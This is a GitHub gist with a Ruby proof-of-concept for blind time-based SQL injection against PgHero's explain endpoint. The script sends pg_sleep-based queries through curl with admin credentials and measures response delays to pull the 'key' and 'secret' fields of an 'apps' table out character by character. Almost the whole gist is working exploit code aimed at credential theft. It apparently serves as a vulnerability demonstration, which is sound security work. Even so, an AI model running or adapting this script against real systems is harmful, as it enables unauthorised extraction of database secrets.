Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Blind time-based SQL injection attack, proof of concept (with PgHero)
# More information available at https://www.owasp.org/index.php/Blind_SQL_Injection
POSITIVE_DELAY = 2
CHARS = ('A'..'Z').to_a + ('a'..'z').to_a + ('0'..'9').to_a
def query(table, field, id, char, pos)
%Q[SELECT CASE WHEN substr(#{field}, #{pos}, 1) = \'#{char}\' THEN pg_sleep(#{POSITIVE_DELAY}) ELSE NULL END FROM #{table} WHERE id = #{id} ;]
end
def timeit
t0 = Time.now
yield
Time.now - t0
end
def sql_test(table, field, id, char, pos)
cmd = %Q[psql mydatabase -c "#{query(table, field, id, char, pos)}"]
timeit { `#{ cmd }` } > POSITIVE_DELAY
end
def curl_test(table, field, id, char, pos)
cmd = <<-CMD.gsub("\n", ' ')
curl --silent -d "query=#{query(table, field, id, char, pos)}" -d "commit=Analyze"
--user admin:password
https://myhost.com/pghero/explain
CMD
timeit { `#{ cmd }` } > POSITIVE_DELAY
end
def retrieve_field(table, field, id)
buffer = ""
(1..255).each do |pos|
found = false
CHARS.each do |char|
if curl_test(table, field, id, char, pos)
puts "#{pos}: #{char}"
buffer << char
found = true
break # once a match is found, move on
end
end
break unless found # if nothing matched, treat as end of string
end
buffer
end
key = retrieve_field('apps', 'key', 1)
puts "key: #{key}"
secret = retrieve_field('apps', 'secret', 1)
puts "secret: #{secret}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.